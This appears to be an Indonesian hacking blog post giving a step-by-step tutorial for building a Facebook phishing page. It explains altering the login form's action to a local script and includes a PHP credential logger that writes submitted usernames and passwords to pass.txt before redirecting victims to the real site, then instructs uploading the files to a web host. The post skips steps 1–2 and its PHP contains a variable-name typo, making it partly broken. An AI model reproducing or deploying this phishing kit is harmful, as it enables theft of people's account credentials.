Penjelasan dulu yaa...
pada teknik hacking yg satu ini, modus operandinya adalah berusaha membuat seseorang mengunjungi situs yg salah sehingga memberikan informasi(ya pasti udah pada tau kan haha).
Umumnya pelaku membuat situs yg memiliki nama domain mirip dgn aslinya. istilah phising identik dengan Web Spoofing,DNS Spoofing, dam Pharming. Teknik ini jg biasa disebut FakeLogin.
Oke Kita mulai langkah pertama :
Sebagai contoh kasus, saya akan menggunakan Facebook.Berikut langkah teknisnya:
3,Copy dan paste script yg muncul tsb pd notepad
4.Cari kode "action=" (tanpa tanda kutip) untuk kita modifikasi.
5.pada action="https://login.facebook.com/login.php", ubahlah menjadi action="secret.php" kemudian ubah juga methode dr "POST" MENJADI "GET"
6.Simpan file tsb dengan nama index.php. supaya menjadi file berjenis PHP bukan TXT, dalam kotak dialog Save As, pd bagian save as type, pilih all files.
7.skrng buka lembaran notepad yg baru,dan isikan script berikut;
<?php
header("Location : http://www.Facebook.com/login.php ") ;
$handle = fopen ("pass.txt", "a") ;
foreach ($_GET as $varieble => $value) {
fwrite ($handle, $variable) ;
fwrite ($handle, "=") ;
fwrite ($handle, $value) ;
fwrite ($handle, "\r\n") ;
}
fwrite ($handle, "\r\n") ;
fclose ($handle) ;
exit;
?>
8.simpang dengan nama file secret.php
9.buka notepad lagi dan biarkan isinya kosong, dan simpan dgn nama pass.txt.
10. Upload ketiga file tsb "index.php, secret.php, pas.txt' ke dalam website hosting kalian.
11. Nahh kini anda sudah berhasil memiliki halaman phising facebook
1 LAGI HURUF "$" DIGANTI DENGAN HURUF YG MIRIP DENGAN DOLAR....BUKAN MEMAKAI DOLAR.
SEKIAN DAN TERIMAKASIH,
SEMOGA BERMANFAAT,
HIDUP IRH HAHAHA
No comments:
Post a Comment